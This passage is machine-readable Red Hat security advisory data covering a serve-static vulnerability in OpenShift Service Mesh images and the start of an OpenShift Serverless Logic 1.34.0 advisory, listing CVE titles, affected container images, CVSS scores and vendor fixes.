"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:22:37+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7724", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, ], }
rhsa-2024_8023
Vulnerability from csaf_redhat
Published
2024-10-14 00:59
Modified
2024-12-18 04:38
Summary
Red Hat Security Advisory: Release of OpenShift Serverless Logic 1.34.0 security update & enhancements
Notes
Topic
Release of OpenShift Serverless Logic 1.34.0
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
This release includes security, bug fixes, and enhancements.
Security Fix(es):
* axios: axios: Server-Side Request Forgery (CVE-2024-39338)
* express: Improper Input Handling in Express Redirects (CVE-2024-43796)
* io.vertx/vertx-grpc-client: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)
* io.vertx/vertx-grpc-server: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
For more details about the security issues, including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE pages listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Release of OpenShift Serverless Logic 1.34.0\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "This release includes security, bug fixes, and enhancements.\n\nSecurity Fix(es):\n\n* axios: axios: Server-Side Request Forgery (CVE-2024-39338)\n\n* express: Improper Input Handling in Express Redirects (CVE-2024-43796)\n\n* io.vertx/vertx-grpc-client: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)\n\n* io.vertx/vertx-grpc-server: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)\n\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n\nFor more details about the security issues, including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE pages listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:8023", url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2309758", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309758", }, { category: "external", summary: "2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8023.json", }, ], title: "Red Hat Security Advisory: Release of OpenShift Serverless Logic 1.34.0 security update & enhancements", tracking: { current_release_date: "2024-12-18T04:38:42+00:00", generator: { date: "2024-12-18T04:38:42+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.3", }, }, id: "RHSA-2024:8023", initial_release_date: "2024-10-14T00:59:58+00:00", revision_history: [ { date: "2024-10-14T00:59:58+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-14T00:59:58+00:00", number: "2", summary: "Last updated version", }, { date: "2024-12-18T04:38:42+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "8Base-Openshift-Serverless-1.34", product: { name: "8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34", product_identification_helper: { cpe: "cpe:/a:redhat:openshift_serverless:1.34::el8", }, }, }, ], category: "product_family", name: "Red Hat OpenShift Serverless", }, { branches: [ { category: "product_version", name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", product: { name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", product_id: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", product_identification_helper: { purl: "pkg:oci/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-ephemeral-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", product: { name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", product_id: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", product_identification_helper: { purl: "pkg:oci/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-postgresql-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", product: { name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", product_id: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", product_identification_helper: { purl: "pkg:oci/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-ephemeral-rhel8&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", product: { name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", product_id: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", product_identification_helper: { purl: "pkg:oci/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-postgresql-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", product: { name: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", product_id: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", product_identification_helper: { purl: "pkg:oci/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8&tag=1.34.0-2", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", product: { name: "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", product_id: "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", product_identification_helper: { purl: 